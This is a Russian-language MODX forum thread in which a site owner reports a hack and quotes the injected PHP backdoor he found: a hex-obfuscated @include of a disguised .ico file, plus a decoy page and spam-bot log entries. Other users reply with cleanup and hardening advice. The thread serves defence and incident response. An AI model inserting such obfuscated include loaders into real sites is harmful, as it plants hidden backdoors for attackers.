Взлом сайта

Добрый день.
Сегодня зарегистрировали взлом сайта. При поиске по серверу были обнаружены следующие файлы:

/core/lexicon/index.php

с таким содержимым:

<?php
/*93a2a*/

@include "\x2fva\x72/w\x77w/\x75se\x726/\x64at\x61/w\x77w/\x64iz\x61in\x76ol\x6fs.\x72u/\x63or\x65/m\x6fde\x6c/a\x77s/\x66av\x69co\x6e_e\x39e6\x35a.\x69co";

/*93a2a*/


echo file_get_contents('index.html.bak.bak');

И рядышком файл

index.html.bak.bak

с таким содержимым:

<h2>Unauthorized access</h2>
You're not allowed to access file folder

В логах много таких записей:

«GET /site/emvkdb.php?nuxk=2011-nissan-gtr-for-sale HTTP/1.0» 200 4080 "-" «Mozilla/5.0 (compatible; MJ12bot/v1.4.7; mj12bot.com/)»

Конструкция из файла index.php обнаружена в нескольких файлах, с разными символами, но принцип один и тот же. Скажите, была и ли кого-то такая проблема и как ее решали? Ну и в целом как обезопасить себя от подобных неприятностей?

Андрей

29 декабря 2017, 08:42

4 766

Комментарии: 13

Михаил

29 декабря 2017, 11:44

Какая версия MODX? Какие стоят компоненты? Есть ли формы на сайте? Как они обрабатываются? Какой хостинг?

Андрей

29 декабря 2017, 11:47

Версия MODX: MODX Revolution 2.5.7-pl (advanced)
Формы есть, работают через связку Formit + AjaxForm
Хостинг: сервер на FirstVDS

Николай

29 декабря 2017, 13:36

Ну и в целом как обезопасить себя от подобных неприятностей?

Ставить пароль на папки manager connectors и core (https://modhost.pro/help/nginx). А так же была большая статья про безопасность где-то на сайте.

Андрей

29 декабря 2017, 13:56

Спачибо, полезно)

Алексей Шумаев

29 декабря 2017, 16:30

Сначала посмотрите внимательно пользователей в админке, особенно с правами админа.
Могут быть сюрпризы.
1) закройте сайт, очистите. Или восстановите с чистой копии.
2) вынесете core выше web
3) настройте базовую авторизацию на админку.
4) Поставьте web-антивирус. Он вам как минимум сразу даст знать, если снова будут внесены изменения в файлы.
Дальше по ситуации, пока не будет выявлен способ проникновения, ежели повториться.
По очистке погуглите: нужно будет сначала выявить изменённые файлы через консоль.

Андрей

29 декабря 2017, 17:39

Алексей, а какой антивирус посоветуете?

Алексей Шумаев

29 декабря 2017, 18:49

Я как-то пробовал в одном проблемном запущенном случае SANTI.PRO, если не ошибаюсь.

Димыч

30 декабря 2017, 10:49

Тоже на firstvds держу сайты, чистил недавно от такой же заразы. На старом сайте с modx стоял неиспользуемый office — после того, как убрал и обновил modx, перестали вирусы лезть. Вычищал с помощью Virusdie — его можно прямо с панели установить.

Эрадж Шамс

26 января 2018, 13:41

Тоже самое, уже месяц мучаюсь. Я никак не системный администратор, может кто помочь с данной проблемой? За вознаграждение, конечно.

Алексей Шумаев

27 января 2018, 18:37

Думаю, лучше самому попробовать устранить. Я выше написал простой сценарий, там не нужно особых знаний. Это даст опыт; и всё равно после устранения проблемы следите за сайтом (за изменением файлов как минимум). Ну а если уже не получится, тогда искать помощи…
Зато в следующий раз вы будете более готовы к таким проблемам, если вдруг снова возникнут.

Алексей Смирнов

21 июля 2018, 00:25

Новая волна взломов подобного плана.
На одном сайте где стояла древняя 2.3.1 в логах заметил что стучались через коннектор phpthumb
Вариант лечения (в идеале)
1. Выкатывается недавний бекап.
2. обновляется ядро до последней 2.6.4 (с 2.3.1 на 2.6.4. прошло все хорошо). заметил что 2.5.1 версия так же заражается. 2.5.4, 2.5.8. — пока под вопросом.
3. БД пока не заметил что трогает. вроде чиста.
Признаки вируса:
в корневой файлы dbs.php cache.php. Все JS на сайте обнуляют на какой-то код, поэтому JS тоже нужно весь менять. (каспер ругается страшно на эти js)
так же местами присутствует файл в корне annizod.
Если у кого еще есть инфа — трогает ли этот вирус БД — дайте знать. Спасибо.
Учитывая масштаб — вирусяка автоматическая.

Алексей Смирнов

21 июля 2018, 00:37